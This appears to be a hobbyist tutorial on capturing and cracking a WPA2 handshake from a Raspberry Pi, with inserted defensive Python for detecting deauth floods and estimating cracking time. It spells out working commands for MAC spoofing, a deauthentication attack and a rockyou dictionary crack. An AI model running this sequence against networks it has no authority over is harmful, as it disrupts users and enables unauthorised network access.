Very Serious Legal Disclaimer
This tutorial is intended for you to test YOUR OWN NETWORK INFRASTRUCTURE AND HARDWARE OR NETWORK INFRASTRUCTURE and hardware you have specific permission to audit[1]. I am not a lawyer, I am not your lawyer and you really shouldn’t do anything stupid or bad with the information contained in this post.
If you’re just learning to hack, follow this simple principle: do not hack things without permission[2].
What you should do is learn this stuff and make your networks, and any network you are responsible for, that much more difficult to pop.
Text, Video or Pictures
Depending on what type of learning you prefer, it might be easier for you to watch a video of this process; that video is at the end of this post.
This post assumes you have a Raspberry Pi 3B+ (RPi) running the operating system Raspbian Stretch Lite. It’s important to use the light version as it doesn’t contain anything you don’t need. Anything you do need you can install.
You will also need a Wi-Fi adapter that you can put into Monitor Mode, on this version of the RPi it is possible to do that but I would definitely recommend splashing out the 20 to 30 quid on an Alfa USB Wi-Fi radio. I’ve tried loads of them but I always end up coming back to the Alfa AWUS036NHA USB Wi-Fi radio.
Install The Necessary Software
First we need to install the software we are going to need to Hack all the packets! The software packages we are going to install are:
- wget & curl For grabbing things from the Internet
- iw For monkeying with network connections
- aircrack-ng For grabbing handshakes and attempting to guess the password
- macchanger To give us a random MAC address
sudo apt install wget curl
sudo apt install iw
Install Aircrack Suite
sudo apt install aircrack-ng
sudo apt install macchanger
Hunt the Radio!
On the RPi the interface named wlan0[3] tends to be the Wi-Fi radio on the RPi itself, and whilst it’s possible to use the on-board Wi-Fi in Monitor Mode, you will have much better results (range, signal strength etc.) with the USB Wi-Fi radio. That being said, it’s time to find out whether the RPi recognises your USB Wi-Fi radio.
Find Your USB Radio
To find out if your radio is connected, run the following command in your Terminal:
lsusb
Which will hopefully output something in the terminal that looks like this:
Bus 001 Device 004: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
If you’re not sure which USB device is your Wi-Fi radio, unplug your USB radio and run the command again. You should be able to see what’s missing.
Is It Can Be Wireless?
We need to check whether your USB radio can be used in a Usefully Wireless Way™. Run the command below to find out:
Test USB Antenna Usefulness
iwconfig
The results of this command should contain something like the following (if they do, you are onto a winner):
iwconfig Command Output
wlan1     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
Time Spent On Reconnaissance Is Seldom Wasted
airmon-ng is part of the aircrack-ng suite of tools, which we’re going to use to place our wireless interface into the right modes. Let’s see which wireless interfaces airmon-ng is aware of, and can therefore use, by running:
Check Useful Wi-Fi Interfaces
airmon-ng
Which should give you the following output. The one we are going to be acting upon is called wlan1.
PHY     Interface       Driver          Chipset

phy0    wlan0           brcmfmac        Broadcom 43430
phy1    wlan1           rt2800usb       Ralink Technology, Corp. RT2870/RT3070
For the software to do the things that it does, the antenna needs to be put in a state known as Monitor Mode. We do this by simply issuing the following command: (The command may vary slightly if your Wi-Fi adapter has a different name.)
Put wlan1 into Monitor Mode
airmon-ng start wlan1
This is a pretty typical output from the command above. As you can see a new Monitor Mode network interface has been created called: wlan1mon. Without putting your radio into Monitor Mode, nothing that follows will work.
Airmon-ng start wlan1 Output
PHY     Interface       Driver          Chipset

phy0    wlan0           brcmfmac        Broadcom 43430
phy1    wlan1           rt2800usb       Ralink Technology, Corp. RT2870/RT3070

                (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
                (mac80211 station mode vif disabled for [phy1]wlan1)
Now, I know that you’ve got full permission to go after this particular access point, so you might wonder why you need to mask your computer’s identity by changing the MAC address. Well, you don’t. But if you intend to start a career in penetration testing, then developing the habit of routinely masking your computer’s identity and not leaking any personally identifiable information will serve you well. Changing your MAC address is a very basic step that you can take. You can change the MAC address of your computer with macchanger.
Take Down Monitor Mode Interface Temporarily
ifconfig wlan1mon down
Temporarily change your MAC Address
macchanger -r wlan1mon
This will output something like the following. Do not be tempted to set a random MAC address permanently: the reason we are changing the MAC address is to get rid of any permanent identifiers, so get into the habit of doing this each time you run the process.[4]
Current MAC:   00:25:22:XX:XX:XX (ASRock Incorporation)
Permanent MAC: 00:25:22:XX:XX:XX (ASRock Incorporation)
New MAC:       00:11:22:XX:XX:XX (CIMSYS Inc)
This brings the Monitor Mode Wi-Fi interface back up so that we can use it for the rest of the tutorial:
Bring Monitor Mode Interface Back Up
ifconfig wlan1mon up
Let’s Get Scanning
Now we get to the good part. Here is a video of the process from installing the software to beginning the scanning process. I would recommend reading the text instructions as well but lots of people find these videos useful:
Airmon-ng & Airodump-ng
Use the following command to do a survey of all of the Wi-Fi access points and clients that are within range of your machine:
NOTE: your monitoring interface may be called something other than wlan1mon. Replace the name of your interface in the commands below where necessary.
Initial Airodump-ng Scan
airodump-ng wlan1mon
You will get output looking like this. I have again redacted some of the information to protect the guilty:
Airodump-ng Scan Output
CH  8 ][ Elapsed: 18 s ][ 2019-03-28 22:16 ][ sorting by beacon number

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 2C:FD:A1:XX:XX:XX  -45       13      132   14   9  54   WPA2 CCMP   PSK  Pretty Fly for a Wi-Fi
 B8:27:EB:XX:XX:XX  -38       13       43    0   7  54   WPA2 CCMP   PSK  PiFi

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 2C:FD:A1:XX:XX:XX  40:B4:CD:XX:XX:XX  -36   0e-24e     8       58  is acutely
 2C:FD:A1:XX:XX:XX  D0:73:D5:XX:XX:XX  -62    1 -11     0        2
 B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -28    0 -48     0       22
 B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -70    0 - 5     0
Pick On A Target
Okay, now we need to choose a victim (or, you know, a legally allowed client). In this instance it will be my access point called PiFi, and the name of the game is to capture the 4-Way Handshake. This is a cryptographic artefact which is generated each time a device associates with a wireless access point. When your mobile phone or laptop connects to your home Wi-Fi it exchanges information with your Wi-Fi router, and one of those pieces of information is the 4-Way Handshake. Amongst other things, the 4-Way Handshake contains the Wi-Fi password for that access point. It is in a hashed state, but once we have grabbed it out of the ether we can go about cracking it.
When thinking about target selection you are always going to be much better off choosing a wireless access point that has one or more clients connected to it. While technically you could just leave the command running and wait for somebody to connect to your access point of choice, it’s much quicker to choose one that has a client you can bump off the network.
TL;DR: We will be running a deauthentication attack.
Picking on the Access Point
airodump-ng -c 7 -w PiFi --bssid B8:27:EB:XX:XX:XX wlan1mon
airodump-ng = Software to monitor Access Points
-c 7 = The channel of our chosen victim
-w PiFi = The prefix for the capture files; we name it after our access point, which is why the capture later turns up as PiFi-01.cap
--bssid B8:27:EB:XX:XX:XX = The BSSID (MAC address) of our access point
wlan1mon = The name of our Monitor Mode interface
You can see that the airodump-ng command we just issued is very similar to the first one we did, except it is exclusively focusing on one access point. Your MAC addresses and access point name will be different, but your output will look like this:
Specific Access Point airodump-ng Output
CH  7 ][ Elapsed: 18 s ][ 2019-03-29 10:48 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 B8:27:EB:XX:XX:XX  -34 100      186       91   16   7  54   WPA2 CCMP   PSK  PiFi

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -24    0 -48     0        1
 B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -58   36 -24    83       88
Bump Them Off!
This is very important: you must leave that running and open up a new terminal for the next command. The purpose of this command is to pick on one of the clients connected to PiFi and try and bump them off the network. When they try to reconnect they will be successful, but during the process we can swipe one of the 4-Way Handshakes they exchange with the access point without them knowing! Mwahaha!
Kick Them Off The Access Point
aireplay-ng -0 50 -e PiFi -a B8:27:EB:XX:XX:XX -c 00:1d:d9:XX:XX:XX wlan1mon
aireplay-ng = Software needed for a deauthentication attack
-0 50 = -0 indicates we want to carry out a deauthentication attack; 50 is a whole number denoting how many packets we should send. YMMV with how many you need to achieve the job; I generally use 50 with a fair degree of success.
-e PiFi = The ESSID (name) of our access point
-a B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the ACCESS POINT
-c 00:1d:d9:XX:XX:XX = The MAC address of the CLIENT we want to knock off the access point
wlan1mon = The name of our Monitor Mode interface
Now, if you look back at the first terminal window that is monitoring the access point, you should see a change if you are successful. In the top right hand corner of the screen you should see the message [ WPA handshake: B8:27:EB:XX:XX:XX ], with the MAC address of the access point being shown. This means you now have a file containing a hashed version of the password needed to authenticate with the Wi-Fi access point.
It will probably look something like this:
WPA 4-Way Handshake Captured
CH  7 ][ Elapsed: 18 s ][ 2019-03-29 10:48 ][ WPA handshake: B8:27:EB:XX:XX:XX

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 2C:FD:A1:XX:XX:XX  -24   0        0        1    0   9  54   WPA2 CCMP   PSK  The Night's Switch.
 B8:27:EB:XX:XX:XX  -34 100      186       91   16   7  54   WPA2 CCMP   PSK  PiFi

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 B8:27:EB:XX:XX:XX  00:C0:CA:XX:XX:XX  -24    0 -48     0        1
 B8:27:EB:XX:XX:XX  F0:18:98:XX:XX:XX  -58   36 -24    83       88
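The deauthentication burst you just sent is also exactly what a defender watches for. The following is an added example, not code from the original post: a small pure-Python detector that parses raw 802.11 management headers and flags any source that sends more than a threshold of deauth/disassoc frames to one destination inside a sliding window. The frame builder, the 02:... addresses, the timestamps and the threshold are all constructed for the sample; a real sensor would feed it frames read from a monitor-mode capture or a pcap.

```python
import struct
from collections import defaultdict, deque
# 802.11 frame-control byte 0 = (subtype << 4) | (type << 2) | version; management frames are type 0.
BEACON, DISASSOC, DEAUTH = 0x80, 0xA0, 0xC0        # management subtypes 8, 10, 12

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame: bytes):
    """Parse the 24-byte 802.11 management header; None for data/control frames."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:
        return None
    subtype = frame[0] >> 4
    info = {"subtype": subtype, "dst": mac_str(frame[4:10]), "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22]), "reason": None}
    if subtype in (10, 12) and len(frame) >= 26:   # disassoc/deauth carry a 2-byte reason code
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info

def build_mgmt(fc0: int, dst: str, src: str, bssid: str, body: bytes = b"") -> bytes:
    """Builds the constructed sample frames below; a real sensor would read frames from a pcap."""
    hexmac = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([fc0, 0]) + b"\0\0" + hexmac(dst) + hexmac(src) + hexmac(bssid) + b"\0\0" + body

def find_deauth_floods(frames, window_s: float = 1.0, threshold: int = 10) -> dict:
    """frames: iterable of (timestamp_seconds, raw_frame). Flags a (src, dst) pair that sends
    more than `threshold` deauth/disassoc frames inside any sliding window of `window_s`."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in frames:
        m = parse_mgmt(raw)
        if not m or m["subtype"] not in (10, 12):
            continue
        key = (m["src"], m["dst"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:                  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            alert = alerts.setdefault(key, {"count": 0, "reason": m["reason"]})
            alert["count"] = max(alert["count"], len(q))
    return alerts

# Constructed sample: two ordinary beacons, then 20 deauths in 0.4 s carrying the AP's address as
# source and one client as destination, which is how the aireplay-ng step above looks to a sensor.
AP, CLIENT = "02:00:00:00:00:01", "02:00:00:00:00:02"   # locally administered placeholders
SAMPLE = [(t, build_mgmt(BEACON, "ff:ff:ff:ff:ff:ff", AP, AP)) for t in (0.0, 0.1)]
SAMPLE += [(1.0 + i * 0.02, build_mgmt(DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))) for i in range(20)]
if __name__ == "__main__":
    for (src, dst), a in find_deauth_floods(SAMPLE).items():
        print(f"deauth flood: {a['count']} frames {src} -> {dst}, reason code {a['reason']}")
```

A legitimate AP rarely needs to deauthenticate the same client more than a handful of times a second, so a burst like this from "the AP's" address is a strong signal that someone is spoofing it.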
The Hard Part
All of this has been leading up to us cracking the hashed password and revealing the plaintext version so that we can authenticate with the access point. There are a number of ways to do that, but the most accessible is to use a Dictionary Attack and a piece of software called Aircrack-ng. I will post more about this topic in the future as it totally fascinates me.
For now, here’s a quick example of using the tool to try and crack the password.
We use a dictionary attack, which takes a huge list of passwords, hashes them using the same algorithm as the Wi-Fi access point, and then compares them to the hash we have captured in our 4-Way Handshake. If it finds a match then you are successful; however, if the password captured in the 4-Way Handshake is not contained in the dictionary then you will be out of luck. These dictionary attacks also take a very long time, and the more you do it the better your dictionaries will get, but this is by no means a foolproof way of getting the password. You are relying upon people’s habit of not using good passwords.
The RockYou List
The rockyou.txt password list is one of the standard dictionary lists of passwords that appeared out of the mists of time, from who knows when and who knows where… To get your copy of this holy talisman use the following command:
Rock My World
Cracking the Hashed Password
aircrack-ng -w rockyou.txt -b B8:27:EB:XX:XX:XX PiFi-01.cap
aircrack-ng = Software needed to try cracking a password
-w rockyou.txt = Points aircrack-ng at the word list called rockyou.txt
-b B8:27:EB:XX:XX:XX = The BSSID (MAC address) of the ACCESS POINT
PiFi-01.cap = The file we captured earlier containing the 4-Way Handshake
If you managed to capture a hashed password, running the command above will produce the following output. Note the gigantic amount of time this takes; obviously a more powerful CPU generally equals a shorter cracking time. But it doesn’t matter how fast your computer is: if the password is not in your dictionary then you will not crack it.
                                 Aircrack-ng 1.5.2

      [00:00:09] 1484/9822769 keys tested (168.84 k/s)

      Time left: 16 hours, 14 minutes, 20 seconds                    0.02%

                           Current passphrase: addicted

      Master Key     : 90 DC DF 8F BA AD 8A 78 88 23 19 51 F0 BC 46 B7
                       A1 78 2D 0D 5F 4C 2E FE 72 DE BF F3 43 E8 4E A1

      Transient Key  : D9 78 50 9E FF 4E FE C4 7D 47 10 B9 43 22 6E 10
                       28 32 4B 37 DF A2 61 85 9A E9 F1 5B 28 62 E3 4A
                       5D 61 01 9C CE 39 C7 96 AC 1B B2 47 73 24 D0 9A
                       6D BB 55 A8 B5 B2 3B 11 7D 99 27 14 1B B1 84 ED

      EAPOL HMAC     : C4 91 54 B6 AB 05 CF E7 D8 DF 90 C1 6E 43 56 EC
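To make "the same algorithm as the Wi-Fi access point" concrete, here is an added example that is not from the original post or from the aircrack-ng project: it derives a WPA2-PSK pairwise master key with PBKDF2 the way IEEE 802.11i specifies, then plugs the dictionary size and keys-per-second rate from the aircrack-ng output above into a worst-case time estimate, and contrasts that with a random 12-character passphrase. The rockyou size and the rate are read off that output; the 12-character comparison and the 62-symbol alphabet are assumptions.

```python
import hashlib

# Figures read off the aircrack-ng output above: rockyou.txt holds 9,822,769 candidates and the
# Pi tested them at 168.84 keys per second.
ROCKYOU_WORDS = 9_822_769
PI_KEYS_PER_SECOND = 168.84

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key as IEEE 802.11i defines it: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 iterations, 32 bytes. This is the 'same algorithm as the access
    point' step that every dictionary guess has to pay for."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, dklen=32)

def search_seconds(candidates: float, keys_per_second: float) -> float:
    """Worst case for a dictionary or keyspace: every candidate gets tried once."""
    return candidates / keys_per_second

def describe(seconds: float) -> str:
    """Coarse human-readable duration: hours/minutes for a wordlist, years for a keyspace."""
    if seconds < 86_400:
        hours, rem = divmod(int(seconds), 3600)
        return f"{hours} hours, {rem // 60} minutes"
    return f"{seconds / (365.25 * 86_400):.3g} years"

def random_keyspace(length: int, alphabet_size: int = 62) -> int:
    """Candidates for a random passphrase of `length` characters over letters and digits (assumed)."""
    return alphabet_size ** length

if __name__ == "__main__":
    # IEEE 802.11i published test vector: passphrase "password" on SSID "IEEE".
    print("PMK(password, IEEE) =", wpa2_pmk("password", "IEEE").hex())
    # Same passphrase, different SSID: different PMK, so tables precomputed for one SSID do not
    # carry over to another. Keeping a common default SSID throws that protection away.
    print("differs on SSID PiFi:", wpa2_pmk("password", "PiFi") != wpa2_pmk("password", "IEEE"))
    print("rockyou.txt on the Pi:", describe(search_seconds(ROCKYOU_WORDS, PI_KEYS_PER_SECOND)))
    print("random 12-char passphrase on the Pi:",
          describe(search_seconds(random_keyspace(12), PI_KEYS_PER_SECOND)))
```

The whole wordlist finishes in about 16 hours on the Pi, matching the "Time left" above, while the random 12-character passphrase comes out in the hundreds of billions of years at the same rate: the defence is passphrase entropy, not CPU speed.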
[1] Yes yes, by audit I obviously mean hack!
[2] Permission from the owner of the hardware, not your mum! (Unless she owns the hardware, natch)
[3] There are some reasons this might not be the case, but you will probably be fine and that is out of scope.
[4] Obviously I have changed my personal MAC address to protect the totally not guilty.